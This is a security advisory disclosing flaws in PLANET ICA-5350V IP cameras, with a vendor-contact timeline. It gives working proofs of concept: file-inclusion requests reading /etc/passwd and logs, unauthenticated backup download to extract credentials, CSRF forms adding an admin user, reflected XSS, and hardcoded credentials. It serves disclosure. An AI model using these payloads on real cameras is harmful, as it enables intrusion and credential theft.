PLANET IP ICA-5350V LFI / XSS / CSRF / Bypass
Posted on 23 February 2016
Overview ======= Technical Risk: high Likelihood of Exploitation: medium Tested version: ICA-5350V/ICA-* Credits: Discovered and researched by GT.Omaz from OrwellLabs Issues ===== I. Local File Inclusion II. Arbitrary file read/Authentication bypass III. Sensitive information disclosure IV. Cross-site request forgery V. Reflected Cross-site scripting VI. hardcoded credentials I. Local File Inclusion ================ The Web Management interface of PLANET IP surveillance Cam model ICA-5350V (and probably some other models, maybe ICA-*) is prone to Local File Include (LFI). POC ------ The request bellow is generated when a new user is added, in this case we are adding the following administrative credential for the cam: "root:r00tx". GET /cgi-bin/admin/querylogin.cgi HTTP/1.1 Host: {xxx.xxx.xxx.xxx} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: *http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp * Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes Authorization: Basic YdRRtXW41YXRtad4= Connection: keep-alive If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT If the value of the parameter "redirect" was changed to any system file will return the contents of that file, as shown below: http:// {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add& *redirect=/etc/passwd * In this case will retrieved the content of /etc/passwd II. Arbitrary file read/Authentication bypass ================================ The camera offers a feature to perform the download settings via a backup file. However, (how acess control is not effective) this file remains accessible via the browser for an unauthenticated user. POC ----- wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz tar -xzvf backup.tar.gz cat tmp/sysConfig/sysenv.cfg|strings|fmt|cut -f8,9 -d" " It will return the credential to access the camera Through this vulnerability a user can also obtain the credential of the AP to which the camera is connected just parsing the file: 'tmp/sysConfig/extra.info' III. Sensitive information disclosure =========================== Using LFI vulnerability report, a user can obtain sensitive information such as username and password by reading the log file, as follows: {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages IV. Cross-site request forgery ====================== Planet IP cams ICA-* are prone to Multple CSRF. POC ------ - This will create a admin credential: root:r00tx <html> <!-- CSRF PoC - --> <body> <form action="http:// {xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=root:r00tx:1"> <input type="submit" value="Submit form" /> </form> </body> </html> - ICA-5350V <html> <!-- CSRF PoC --> <body> <form action="http:// {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp"> <input type="submit" value="Submit form" /> </form> </body> </html> - Del user root <html> <!-- CSRF PoC --> <body> <form action="http:// {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp"> <input type="submit" value="Submit form" /> </form> </body> </html> V. Cross-Site Scripting ================= Cams models ICA-* are prone to Multiple XSS POC ------- http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script> this will pop-up the message XSS in the browser VI. hardcoded credentials ==================== The credentials of web management can be found just viewing the source of page default_nets.htm: POC ------ https://{xxx.xxx.xxx.xxx}/default_nets.htm code: } function av_onload(){ CheckMobileMode(); util_SetUserInfo(); Loadplay(); watchdog(); //alert("watchdog"); } function Loadplay(){ play("*MasterUsr","MasterPwd* ","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99",""); } Timeline ======= 2015-10-02 - Issues discovered 2015-11-30 - Vendor contacted (advisore sent) 2015-12-16 - Vendor contacted (asking for feedback about reported issues) 2015-12-17 - Vendor response (asking for more time to check issues) 2015-12-21 - RD team replied: can't duplicate vulnerabilities.... 2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities persist and can be reproduced.) ...and no news after that...